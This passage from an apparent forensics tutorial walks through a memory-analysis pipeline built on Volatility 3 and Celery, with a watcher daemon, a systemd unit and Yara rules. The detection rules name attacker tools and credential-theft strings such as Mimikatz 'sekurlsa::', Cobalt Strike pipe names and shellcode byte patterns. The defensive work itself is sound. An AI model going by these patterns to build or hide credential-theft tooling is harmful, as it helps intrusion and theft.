SHA256={digest[:16]}...\")\n        # Trigger next stage\n        run_triage.delay(image_id)\n        return image_id\n\n    except Exception as exc:\n        log.error(f\"Validation failed for image {image_id}: {exc}\")\n        raise self.retry(exc=exc, countdown=60)\n\n@app.task(bind=True, max_retries=2)\ndef run_triage(self, image_id: int) -&gt; int:\n    \"\"\"Stage 2: Fast triage - process list, network connections, basic 
anomalies.\"\"\"\n    try:\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"SELECT image_path, hostname FROM memory_images WHERE id = %s\", (image_id,))\n                image_path, hostname = cur.fetchone()\n\n        log.info(f\"Starting triage for {hostname} (image {image_id})\")\n\n        # Update status\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"UPDATE memory_images SET status='triage_running' WHERE id=%s\", (image_id,))\n            conn.commit()\n\n        # \u2500\u2500 Process list \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n        processes = run_vol(image_path, 'windows.pslist')\n        suspicious_procs = []\n        proc_records = []\n\n        # Known suspicious parent-child relationships\n        suspicious_pairs = {\n            ('winword.exe', 'cmd.exe'), ('winword.exe', 'powershell.exe'),\n            ('excel.exe',   'cmd.exe'), ('excel.exe',   'powershell.exe'),\n            ('outlook.exe', 'cmd.exe'), ('outlook.exe', 'powershell.exe'),\n        }\n\n        pid_to_name = {}\n        for proc in processes:\n            name = (proc.get('ImageFileName') or proc.get('Name') or '').lower()\n            pid  = proc.get('PID') or proc.get('Pid', 0)\n            ppid = proc.get('PPID') or proc.get('PPid', 0)\n            pid_to_name[pid] = name\n\n        for proc in processes:\n            name  = (proc.get('ImageFileName') or proc.get('Name') or '').lower()\n            pid   = proc.get('PID') or proc.get('Pid', 0)\n            ppid  = proc.get('PPID') or proc.get('PPid', 0)\n            path  = proc.get('Path') or proc.get('Exe') or ''\n            
is_suspicious = False\n            reason = []\n\n            # Check parent-child anomalies\n            parent_name = pid_to_name.get(ppid, '')\n            if (parent_name, name) in suspicious_pairs:\n                is_suspicious = True\n                reason.append(f\"Suspicious parent: {parent_name} spawned {name}\")\n\n            # Check for masquerading (svchost outside System32)\n            if name in ['svchost.exe', 'lsass.exe', 'csrss.exe', 'winlogon.exe']:\n                if path and 'system32' not in path.lower():\n                    is_suspicious = True\n                    reason.append(f\"System process outside System32: {path}\")\n\n            if is_suspicious:\n                suspicious_procs.append(pid)\n\n            proc_records.append((\n                image_id, pid, ppid, name, path,\n                proc.get('CmdLine') or proc.get('CommandLine') or '',\n                is_suspicious, ', '.join(reason) if reason else None\n            ))\n\n        # Bulk insert processes\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                execute_values(cur, \"\"\"\n                    INSERT INTO process_list\n                        (image_id, pid, ppid, name, path, cmd_line, is_suspicious, suspicious_reason)\n                    VALUES %s\n                \"\"\", proc_records)\n            conn.commit()\n\n        # \u2500\u2500 Network connections \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n        connections = run_vol(image_path, 'windows.netscan')\n        conn_records = []\n        suspicious_ports = {4444, 8080, 8443, 1337, 31337, 443, 80}\n        internal_ranges  = ['10.', '172.16.', '172.17.', '172.18.', '192.168.']\n\n        for c in connections:\n            
remote = c.get('ForeignAddr') or c.get('RemoteAddr') or ''\n            rport  = c.get('ForeignPort') or c.get('RemotePort') or 0\n            pid    = c.get('PID') or c.get('Pid') or 0\n            is_sus = (\n                pid in suspicious_procs and\n                not any(remote.startswith(r) for r in internal_ranges)\n            )\n            conn_records.append((\n                image_id, pid,\n                c.get('ImageFileName') or c.get('Owner') or '',\n                c.get('LocalAddr') or '', c.get('LocalPort') or 0,\n                remote, rport,\n                c.get('State') or '',\n                is_sus\n            ))\n\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                execute_values(cur, \"\"\"\n                    INSERT INTO network_connections\n                        (image_id, pid, process_name, local_addr, local_port,\n                         remote_addr, remote_port, state, is_suspicious)\n                    VALUES %s\n                \"\"\", conn_records)\n            conn.commit()\n\n        # \u2500\u2500 Triage summary \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n        risk_score = (\n            len(suspicious_procs) * 10 +\n            sum(1 for c in conn_records if c[-1]) * 5\n        )\n\n        summary = {\n            'process_count':        len(proc_records),\n            'suspicious_processes': len(suspicious_procs),\n            'network_connections':  len(conn_records),\n            'risk_score':           risk_score,\n        }\n\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"\"\"\n                    INSERT INTO triage_results\n                        
(image_id, process_count, network_conn_count,\n                         suspicious_process_count, risk_score, triage_summary)\n                    VALUES (%s, %s, %s, %s, %s, %s)\n                \"\"\", (image_id, len(proc_records), len(conn_records),\n                      len(suspicious_procs), risk_score, Json(summary)))\n                cur.execute(\n                    \"UPDATE memory_images SET status='triage_complete' WHERE id=%s\",\n                    (image_id,)\n                )\n            conn.commit()\n\n        log.info(f\"Triage complete for {hostname}: risk_score={risk_score}\")\n        # Always run deep analysis; no task priority is set, so images are taken from\n        # the deep_analysis queue in roughly the order they finish triage\n        run_deep_analysis.delay(image_id)\n        return image_id\n\n    except Exception as exc:\n        log.error(f\"Triage failed for image {image_id}: {exc}\")\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"UPDATE memory_images SET status='triage_failed' WHERE id=%s\", (image_id,))\n            conn.commit()\n        raise self.retry(exc=exc, countdown=120)\n\n@app.task(bind=True, max_retries=2)\ndef run_deep_analysis(self, image_id: int) -&gt; int:\n    \"\"\"Stage 3: Deep analysis - malfind, Yara scanning, kernel callbacks.\"\"\"\n    try:\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"SELECT image_path, hostname FROM memory_images WHERE id = %s\", (image_id,))\n                image_path, hostname = cur.fetchone()\n\n        log.info(f\"Starting deep analysis for {hostname} (image {image_id})\")\n\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"UPDATE memory_images SET status='deep_running' WHERE id=%s\", (image_id,))\n            conn.commit()\n\n        # \u2500\u2500 Malfind 
\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n        malfind_results = run_vol(image_path, 'windows.malfind')\n        malfind_records = []\n\n        for region in malfind_results:\n            pid        = region.get('PID') or region.get('Pid') or 0\n            name       = region.get('Process') or region.get('ImageFileName') or ''\n            protection = region.get('Protection') or ''\n            vad_start  = region.get('Start') or 0\n            vad_end    = region.get('End') or 0\n\n            # Check for PE header (MZ)\n            hexdata    = region.get('Hexdump') or region.get('Data') or ''\n            has_pe     = hexdata.startswith('4d 5a') or 'MZ' in str(hexdata)\n\n            # Estimate entropy from hex data (rough)\n            entropy    = 6.5  # placeholder - real calculation needs binary read\n\n            # Determine risk\n            if 'EXECUTE_READ_WRITE' in protection and has_pe:\n                risk = 'CRITICAL'\n            elif 'EXECUTE_READ_WRITE' in protection:\n                risk = 'HIGH'\n            else:\n                risk = 'MEDIUM'\n\n            malfind_records.append((\n                image_id, pid, name,\n                vad_start, vad_end, protection,\n                has_pe, entropy, None, risk\n            ))\n\n        if malfind_records:\n            with get_db() as conn:\n                with conn.cursor() as cur:\n                    execute_values(cur, \"\"\"\n                        INSERT INTO malfind_results\n                            (image_id, pid, process_name, vad_start, vad_end,\n                             protection, has_pe_header, entropy, yara_matches, risk_level)\n                      
  VALUES %s\n                    \"\"\", malfind_records)\n                conn.commit()\n\n        has_malfind = len(malfind_records) &gt; 0\n\n        # \u2500\u2500 Yara scanning of process memory \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n        if Path(YARA_RULES).exists():\n            yara_results = run_vol(image_path, 'windows.vadyarascan',\n                                   ['--yara-file', YARA_RULES])\n            for match in yara_results:\n                log.warning(f\"YARA HIT on {hostname}: Rule={match.get('Rule')} \"\n                            f\"PID={match.get('PID')} Process={match.get('Process')}\")\n\n        # \u2500\u2500 Kernel callbacks \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n        callbacks = run_vol(image_path, 'windows.callbacks')\n        if callbacks:\n            log.info(f\"  Callbacks found: {len(callbacks)}\")\n\n        # Update triage results with malfind flag\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"\"\"\n                    UPDATE triage_results\n                    SET has_malfind = %s\n                    WHERE image_id = %s\n                \"\"\", (has_malfind, image_id))\n                cur.execute(\n                    \"UPDATE memory_images SET status='deep_complete' WHERE id=%s\",\n                    (image_id,)\n                )\n            conn.commit()\n\n        log.info(f\"Deep analysis complete for {hostname}: \"\n                 f\"{len(malfind_records)} malfind regions\")\n\n        extract_iocs.delay(image_id)\n       
 return image_id\n\n    except Exception as exc:\n        log.error(f\"Deep analysis failed for image {image_id}: {exc}\")\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"UPDATE memory_images SET status='deep_failed' WHERE id=%s\", (image_id,))\n            conn.commit()\n        raise self.retry(exc=exc, countdown=180)\n\n@app.task(bind=True)\ndef extract_iocs(self, image_id: int) -&gt; int:\n    \"\"\"Stage 4: Extract IOCs (external IPs and URLs) from analysis results.\"\"\"\n    try:\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"SELECT image_path, hostname FROM memory_images WHERE id = %s\", (image_id,))\n                image_path, hostname = cur.fetchone()\n\n        log.info(f\"Extracting IOCs for {hostname} (image {image_id})\")\n        ioc_records = []\n        # Private, loopback, link-local and wildcard prefixes (172.16.0.0\/12 = 172.16-172.31)\n        private_prefixes = (('10.', '192.168.', '127.', '0.', '169.254.', '::', 'fe80:', '*')\n                            + tuple(f'172.{n}.' for n in range(16, 32)))\n\n        # Extract IP addresses from network connections\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"\"\"\n                    SELECT DISTINCT remote_addr, remote_port, pid, process_name\n                    FROM network_connections\n                    WHERE image_id = %s AND remote_addr != '' AND remote_addr != '0.0.0.0'\n                \"\"\", (image_id,))\n                for row in cur.fetchall():\n                    remote_addr, port, pid, pname = row\n                    # Skip internal addresses - external IPs are more interesting\n                    if not remote_addr.startswith(private_prefixes):\n                        ioc_records.append((\n                            image_id, 'ip_address', remote_addr,\n                            pid, pname, 'medium', 'netscan'\n                        ))\n\n        # Find the processes behind the high-risk malfind regions\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\"\"\"\n                    SELECT pid, vad_start, vad_end, process_name\n                    FROM malfind_results\n                    WHERE image_id = %s AND risk_level IN ('CRITICAL','HIGH')\n                    LIMIT 20\n                \"\"\", (image_id,))\n                high_risk_regions = cur.fetchall()\n\n        # Volatility 3's windows.strings only maps a pre-built strings file back to\n        # processes, so dump those processes' malfind regions with --dump into an\n        # output directory (-o) and search the raw bytes for URLs instead\n        pids      = sorted({str(r[0]) for r in high_risk_regions})\n        dump_dir  = Path(f'\/srv\/memory\/dumps\/{image_id}')  # dump location: adjust to your layout\n        url_ascii = re.compile(rb'https?:\/\/[a-zA-Z0-9.\/_?=&amp;-]{10,200}')\n        # Same pattern for UTF-16LE (wide) strings: every character is followed by a NUL byte\n        url_wide  = re.compile(rb'h\\x00t\\x00t\\x00p\\x00(?:s\\x00)?:\\x00\/\\x00\/\\x00'\n                               rb'(?:[a-zA-Z0-9.\/_?=&amp;-]\\x00){10,200}')\n        urls = set()\n        if pids:\n            dump_dir.mkdir(parents=True, exist_ok=True)\n            subprocess.run([\n                VOL_CMD, '-f', image_path, '-o', str(dump_dir),\n                'windows.malfind', '--dump', '--pid', *pids\n            ], capture_output=True, text=True, timeout=600)\n            for dump in dump_dir.glob('*.dmp'):\n                raw = dump.read_bytes()\n                urls.update(m.decode() for m in url_ascii.findall(raw))\n                urls.update(m.replace(b'\\x00', b'').decode() for m in url_wide.findall(raw))\n\n        for url in sorted(urls):\n            if not any(legit in url for legit in\n                       ['microsoft.com', 'windows.com', 'windowsupdate.com']):\n                ioc_records.append((image_id, 'url', url, None, None, 'medium', 'malfind'))\n\n        if ioc_records:\n            with get_db() as conn:\n                with conn.cursor() as cur:\n                    execute_values(cur, \"\"\"\n                        INSERT INTO iocs_extracted\n                            (image_id, ioc_type, ioc_value, pid, process_name,\n                             confidence, source_plugin)\n                        VALUES %s\n                        ON CONFLICT DO NOTHING\n                    \"\"\", ioc_records)\n                conn.commit()\n\n        log.info(f\"IOC extraction complete for {hostname}: {len(ioc_records)} IOCs\")\n        generate_report.delay(image_id)\n        return image_id\n\n    except Exception as exc:\n        
log.error(f\"IOC extraction failed for image {image_id}: {exc}\")\n        raise\n\n@app.task(bind=True)\ndef generate_report(self, image_id: int) -&gt; int:\n    \"\"\"Stage 5: Generate an analyst-ready JSON report.\"\"\"\n    try:\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                # Gather all results\n                cur.execute(\"\"\"\n                    SELECT m.hostname, m.image_path, m.image_size_gb, m.sha256,\n                           m.acquired_at, m.os_version, m.tier,\n                           t.process_count, t.network_conn_count,\n                           t.suspicious_process_count, t.risk_score, t.has_malfind\n                    FROM memory_images m\n                    LEFT JOIN triage_results t ON t.image_id = m.id\n                    WHERE m.id = %s\n                \"\"\", (image_id,))\n                meta = cur.fetchone()\n\n                cur.execute(\"\"\"\n                    SELECT pid, ppid, name, path, cmd_line, suspicious_reason\n                    FROM process_list WHERE image_id = %s AND is_suspicious = TRUE\n                \"\"\", (image_id,))\n                suspicious_procs = cur.fetchall()\n\n                cur.execute(\"\"\"\n                    SELECT process_name, remote_addr, remote_port, state\n                    FROM network_connections WHERE image_id = %s AND is_suspicious = TRUE\n                \"\"\", (image_id,))\n                suspicious_conns = cur.fetchall()\n\n                cur.execute(\"\"\"\n                    SELECT pid, process_name, protection, has_pe_header, entropy, risk_level\n                    FROM malfind_results WHERE image_id = %s\n                    ORDER BY risk_level\n                \"\"\", (image_id,))\n                malfind = cur.fetchall()\n\n                cur.execute(\"\"\"\n                    SELECT ioc_type, ioc_value, process_name, confidence\n                    FROM iocs_extracted WHERE image_id = %s\n                
\"\"\", (image_id,))\n                iocs = cur.fetchall()\n\n        hostname   = meta[0]\n        risk_score = meta[10] or 0  # NULL when no triage_results row exists (LEFT JOIN)\n        risk_label = (\n            'CRITICAL' if risk_score &gt;= 50 else\n            'HIGH'     if risk_score &gt;= 20 else\n            'MEDIUM'   if risk_score &gt;= 5  else\n            'LOW'\n        )\n\n        # JSON report\n        report_data = {\n            'hostname':          hostname,\n            'image_id':          image_id,\n            'risk_score':        risk_score,\n            'risk_label':        risk_label,\n            'has_malfind':       meta[11],\n            'suspicious_procs':  len(suspicious_procs),\n            'suspicious_conns':  len(suspicious_conns),\n            'ioc_count':         len(iocs),\n            'iocs':              [{'type': i[0], 'value': i[1], 'process': i[2]} for i in iocs],\n            'malfind_regions':   [\n                {'pid': m[0], 'process': m[1], 'protection': m[2],\n                 'has_pe': m[3], 'risk': m[5]}\n                for m in malfind\n            ],\n        }\n\n        report_dir  = Path(f'\/srv\/memory\/reports\/{hostname}')\n        report_dir.mkdir(parents=True, exist_ok=True)\n\n        json_path = report_dir \/ f'report_{image_id}.json'\n        with open(json_path, 'w') as f:\n            json.dump(report_data, f, indent=2, default=str)\n\n        with get_db() as conn:\n            with conn.cursor() as cur:\n                cur.execute(\n                    \"UPDATE memory_images SET status='complete' WHERE id=%s\",\n                    (image_id,)\n                )\n            conn.commit()\n\n        log.info(f\"Report generated for {hostname}: risk={risk_label} ({risk_score})\")\n        if risk_label in ('CRITICAL', 'HIGH'):\n            log.warning(f\"HIGH PRIORITY: {hostname} requires immediate analyst review\")\n\n        return image_id\n\n    except Exception as exc:\n        log.error(f\"Report generation failed for image {image_id}: 
{exc}\")\n        raise<\/pre>\n<h3>The image watcher: automatically triggering the pipeline<\/h3>\n<p>The pipeline tasks need to be triggered automatically when a new memory image lands in the collection directory. A filesystem watcher daemon monitors the landing zone and starts the processing chain as soon as an image file is detected and is not still being written.<\/p>\n<pre>## image_watcher.py - Filesystem watcher for automatic pipeline triggering\n\n#!\/usr\/bin\/env python3\n\"\"\"\nWatches the Velociraptor upload directory for new memory images.\nAutomatically triggers the processing pipeline when a new image lands.\n\"\"\"\n\nimport time\nimport os\nimport re\nimport logging\nimport psycopg2\nfrom pathlib import Path\nfrom watchdog.observers import Observer\nfrom watchdog.events import FileSystemEventHandler\n\n# pip install watchdog\nfrom pipeline import validate_image  # Import Celery task\n\nlogging.basicConfig(\n    level=logging.INFO,\n    format='%(asctime)s [%(levelname)s] %(message)s',\n    handlers=[\n        logging.FileHandler('\/srv\/memory\/logs\/watcher.log'),\n        logging.StreamHandler()\n    ]\n)\nlog = logging.getLogger(__name__)\n\nWATCH_DIR   = '\/srv\/memory\/landing'\nPOSTGRES_URL = os.environ.get('POSTGRES_URL', 'postgresql:\/\/analyst:changeme@localhost\/memory_analysis')\n\n# Pattern matching Velociraptor-uploaded memory images\n# Format: hostname_timestamp.raw or hostname_timestamp.zip\nIMAGE_PATTERN = re.compile(r'^([a-zA-Z0-9_-]+)_(\\d+)\\.(raw|zip|dmp)$')\n\nclass MemoryImageHandler(FileSystemEventHandler):\n    def __init__(self):\n        self.processing = set()\n\n    def on_closed(self, event):\n        \"\"\"Triggered when a file write is complete (file handle closed).\"\"\"\n        if event.is_directory:\n            return\n        self._handle_new_file(event.src_path)\n\n    def on_created(self, event):\n        \"\"\"Fallback for systems where on_closed is not supported.\"\"\"\n        if event.is_directory:\n      
      return\n        # Wait briefly and check if file is still being written\n        time.sleep(5)\n        path = Path(event.src_path)\n        if not path.exists():\n            return\n        # Check file is not growing (transfer complete)\n        size1 = path.stat().st_size\n        time.sleep(10)\n        size2 = path.stat().st_size\n        if size1 == size2:\n            self._handle_new_file(event.src_path)\n\n    def _handle_new_file(self, filepath: str):\n        path = Path(filepath)\n        if path.name in self.processing:\n            return\n\n        match = IMAGE_PATTERN.match(path.name)\n        if not match:\n            return\n\n        hostname  = match.group(1)\n        timestamp = match.group(2)\n\n        log.info(f\"New image detected: {path.name} from {hostname}\")\n        self.processing.add(path.name)\n\n        try:\n            # Register in database\n            with psycopg2.connect(POSTGRES_URL) as conn:\n                with conn.cursor() as cur:\n                    cur.execute(\"\"\"\n                        INSERT INTO memory_images (hostname, image_path, status)\n                        VALUES (%s, %s, 'received')\n                        ON CONFLICT DO NOTHING\n                        RETURNING id\n                    \"\"\", (hostname, str(path)))\n                    row = cur.fetchone()\n                conn.commit()\n\n            if row:\n                image_id = row[0]\n                log.info(f\"Registered image {image_id} for {hostname}, starting pipeline\")\n                # Kick off the pipeline\n                validate_image.delay(image_id)\n            else:\n                log.warning(f\"Image already registered: {path.name}\")\n\n        except Exception as e:\n            log.error(f\"Failed to register {path.name}: {e}\")\n            self.processing.discard(path.name)\n\ndef main():\n    log.info(f\"Starting image watcher on {WATCH_DIR}\")\n    Path(WATCH_DIR).mkdir(parents=True, exist_ok=True)\n\n 
   handler  = MemoryImageHandler()\n    observer = Observer()\n    observer.schedule(handler, WATCH_DIR, recursive=False)\n    observer.start()\n\n    log.info(\"Watcher running. Press Ctrl+C to stop.\")\n    try:\n        while True:\n            time.sleep(1)\n    except KeyboardInterrupt:\n        observer.stop()\n    observer.join()\n\nif __name__ == '__main__':\n    main()<\/pre>\n<h3>Systemd service for the watcher<\/h3>\n<pre>## \/etc\/systemd\/system\/memory-watcher.service\n\n[Unit]\nDescription=Memory Image Pipeline Watcher\nAfter=network.target docker.service redis.service postgresql.service\nRequires=docker.service\n\n[Service]\nType=simple\nUser=analyst\nWorkingDirectory=\/srv\/memory\nExecStart=\/opt\/vol3-env\/bin\/python3 \/srv\/memory\/image_watcher.py\nRestart=always\nRestartSec=10\n# image_watcher.py already writes \/srv\/memory\/logs\/watcher.log itself; appending\n# stdout\/stderr to the same file would duplicate every line, so leave them in the journal\nEnvironment=POSTGRES_URL=postgresql:\/\/analyst:changeme@localhost\/memory_analysis\nEnvironment=CELERY_BROKER_URL=redis:\/\/localhost:6379\/0\n\n[Install]\nWantedBy=multi-user.target<\/pre>\n<pre>## Enable and start the watcher\nsystemctl daemon-reload\nsystemctl enable memory-watcher\nsystemctl start memory-watcher\nsystemctl status memory-watcher<\/pre>\n<h3>Building a Yara ruleset for memory scanning<\/h3>\n<p>Yara rules are the primary mechanism for identifying known malware families and attacker tooling in memory images. The pipeline already calls <code>windows.vadyarascan<\/code> against each image, but the ruleset it scans against needs to be maintained and compiled correctly to be useful. A poorly maintained Yara ruleset either generates excessive false positives that slow investigation or misses known malware because rules have not been updated. 
This section covers building a ruleset specifically for memory scanning rather than file scanning, which has different considerations.<\/p>\n<p>Memory scanning Yara rules differ from file scanning rules in two important ways. First, you cannot rely on file-level indicators like filesize or hash, because you are scanning a memory region, not a file. Second, strings that are packed, encrypted or obfuscated on disk are often decoded in memory at runtime, which means memory rules can be simpler and more reliable than their file-based equivalents for many malware families.<\/p>\n<pre>\/\/ Yara rule structure for memory scanning\n\/\/ Save to \/srv\/memory\/yara_rules\/\n\n\/\/ rules\/cobalt_strike.yar\nrule CobaltStrike_Beacon_Config_Decoded {\n    meta:\n        description = \"Detects decoded Cobalt Strike beacon configuration in memory\"\n        author      = \"justruss\"\n        date        = \"2026-01-01\"\n        confidence  = \"high\"\n    strings:\n        \/\/ BeaconType field prefix in decoded config\n        $beacon_cfg  = { 00 01 00 01 00 00 00 ?? }\n        \/\/ Common C2 URI patterns in decoded beacon memory\n        $uri_pattern = \"\/updates\" ascii wide\n        $uri_cdn     = \"\/CDN\/\" ascii wide\n        \/\/ Sleep mask pattern common across CS versions\n        $sleep_mask  = { C7 44 24 ?? 
01 00 00 00 }\n        \/\/ Reflective loader signature\n        $ref_loader  = \"ReflectiveLoader\" ascii\n    condition:\n        ($ref_loader and 1 of ($uri_pattern, $uri_cdn))\n        or ($beacon_cfg and $sleep_mask)\n}\n\nrule CobaltStrike_SMB_Beacon {\n    meta:\n        description = \"Detects Cobalt Strike SMB named pipe beacon in memory\"\n    strings:\n        $pipe_msse   = \"\\\\\\\\.\\\\pipe\\\\MSSE-\" wide ascii\n        $pipe_postex = \"\\\\\\\\.\\\\pipe\\\\postex_\" wide ascii\n        $pipe_msagnt = \"\\\\\\\\.\\\\pipe\\\\msagent_\" wide ascii\n        $pipe_status = \"\\\\\\\\.\\\\pipe\\\\status_\" wide ascii\n    condition:\n        any of them\n}\n\n\/\/ rules\/meterpreter.yar\nrule Meterpreter_Reflective_DLL {\n    meta:\n        description = \"Detects Meterpreter reflective DLL in process memory\"\n    strings:\n        $mz           = { 4D 5A }\n        $ref_loader   = \"ReflectiveLoader\" ascii\n        $meterpreter  = \"meterpreter\" ascii nocase\n        $stdapi       = \"stdapi_\" ascii\n        $priv         = \"priv_elevate\" ascii\n    condition:\n        $mz at 0 and $ref_loader and 1 of ($meterpreter, $stdapi, $priv)\n}\n\n\/\/ rules\/credential_tools.yar\nrule Mimikatz_In_Memory {\n    meta:\n        description = \"Detects Mimikatz variants loaded in process memory\"\n    strings:\n        $mimikatz1  = \"mimikatz\" ascii wide nocase\n        $mimikatz2  = \"sekurlsa::\" ascii wide\n        $mimikatz3  = \"lsadump::\" ascii wide\n        $mimikatz4  = \"kerberos::\" ascii wide\n        $mimikatz5  = \"privilege::debug\" ascii wide\n        $wdigest    = \"wdigest.dll\" ascii wide\n        $lsasrv     = \"lsasrv.dll\" ascii wide\n    condition:\n        2 of ($mimikatz1, $mimikatz2, $mimikatz3, $mimikatz4, $mimikatz5)\n        or ($wdigest and $lsasrv and 1 of ($mimikatz1, $mimikatz2))\n}\n\nrule Rubeus_Kerberos_Tool {\n    meta:\n        description = \"Detects Rubeus .NET Kerberos toolkit in memory\"\n    strings:\n        $rubeus1  = 
\"Rubeus\" ascii wide\n        $asktgt   = \"asktgt\" ascii wide\n        $kerberos = \"kerberoast\" ascii wide nocase\n        $asreproast = \"asreproast\" ascii wide nocase\n        $s4u      = \"s4u\" ascii wide\n    condition:\n        $rubeus1 and 2 of ($asktgt, $kerberos, $asreproast, $s4u)\n}\n\n\/\/ rules\/generic_suspicious.yar\nrule RWX_PE_In_Anonymous_Memory {\n    meta:\n        description = \"PE header in executable anonymous memory - reflective loading\"\n        confidence  = \"medium\"\n    strings:\n        $mz  = { 4D 5A 90 00 }\n        $pe  = { 50 45 00 00 }\n    condition:\n        $mz at 0 and $pe\n}\n\nrule Shellcode_Common_Preambles {\n    meta:\n        description = \"Common shellcode entry patterns in executable memory\"\n    strings:\n        \/\/ x64 NOP sled into shellcode\n        $nop_sled   = { 90 90 90 90 90 90 90 90 FC 48 83 E4 F0 }\n        \/\/ Common x64 shellcode prologue\n        $x64_prolog = { FC 48 83 E4 F0 E8 C? 00 00 00 }\n        \/\/ Common WinExec shellcode pattern\n        $winexec    = { 6A 01 68 63 6D 64 00 }\n    condition:\n        any of them\n}<\/pre>\n<pre>## Yara rule compilation and management script\n## Run regularly to rebuild the combined ruleset\n\n#!\/usr\/bin\/env python3\n\"\"\"\nCompiles individual Yara rule files into a single compiled ruleset.\nValidates rules before compilation to catch syntax errors.\nTests against known-clean samples to check for false positives.\n\"\"\"\n\nimport yara\nimport os\nimport json\nimport logging\nfrom pathlib import Path\nfrom datetime import datetime\n\nlog = logging.getLogger(__name__)\n\nRULES_DIR    = Path('\/srv\/memory\/yara_rules\/rules')\n# Binary output of rules.save() despite the .yar name; load it with yara.load(),\n# or pass it to Volatility as a compiled rules file, not as rule source\nCOMPILED_OUT = Path('\/srv\/memory\/yara_rules\/combined.yar')\nCLEAN_SAMPLES = Path('\/srv\/memory\/yara_rules\/clean_samples')\n\ndef compile_ruleset() -&gt; bool:\n    \"\"\"Compile all .yar files into a single combined ruleset.\"\"\"\n    rule_files = {}\n    errors = []\n\n    for yar_file in 
sorted(RULES_DIR.glob('*.yar')):\n        namespace = yar_file.stem\n        try:\n            # Test compile individually first\n            yara.compile(filepath=str(yar_file))\n            rule_files[namespace] = str(yar_file)\n            log.info(f\"  OK: {yar_file.name}\")\n        except yara.SyntaxError as e:\n            log.error(f\"  SYNTAX ERROR in {yar_file.name}: {e}\")\n            errors.append(str(yar_file.name))\n\n    if errors:\n        log.error(f\"Compilation aborted: {len(errors)} files have syntax errors\")\n        return False\n\n    # Compile combined ruleset\n    try:\n        combined = yara.compile(filepaths=rule_files)\n        combined.save(str(COMPILED_OUT))\n        log.info(f\"Combined ruleset saved: {COMPILED_OUT}\")\n        log.info(f\"Total rules compiled: {len(rule_files)} files\")\n        return True\n    except Exception as e:\n        log.error(f\"Combined compilation failed: {e}\")\n        return False\n\ndef test_against_clean_samples(compiled_path: str) -&gt; int:\n    \"\"\"Test compiled ruleset against clean samples. 
Returns false positive count.\"\"\"\n    if not CLEAN_SAMPLES.exists():\n        log.warning(\"No clean samples directory - skipping false positive test\")\n        return 0\n\n    rules = yara.load(compiled_path)\n    fp_count = 0\n\n    for sample in CLEAN_SAMPLES.glob('*'):\n        if sample.is_file():\n            matches = rules.match(str(sample))\n            if matches:\n                log.warning(f\"FALSE POSITIVE: {sample.name} matched {[m.rule for m in matches]}\")\n                fp_count += 1\n\n    log.info(f\"False positive check: {fp_count} hits in clean samples\")\n    return fp_count\n\nif __name__ == '__main__':\n    logging.basicConfig(level=logging.INFO,\n                        format='%(asctime)s [%(levelname)s] %(message)s')\n    log.info(f\"Compiling Yara ruleset from {RULES_DIR}\")\n    if compile_ruleset():\n        fps = test_against_clean_samples(str(COMPILED_OUT))\n        if fps &gt; 5:\n            log.warning(f\"High false positive count ({fps}) - review rules before use\")\n        else:\n            log.info(\"Ruleset ready for deployment\")\n    else:\n        log.error(\"Ruleset compilation failed - keeping previous version\")<\/pre>\n<h3>Memory carving: recovering deleted files and artefacts<\/h3>\n<p>Memory carving is distinct from Volatility plugin analysis. Where Volatility works with the structured data in a memory image (process tables, VAD trees, network structures), carving treats the image as a raw byte stream and searches for known file signatures. 
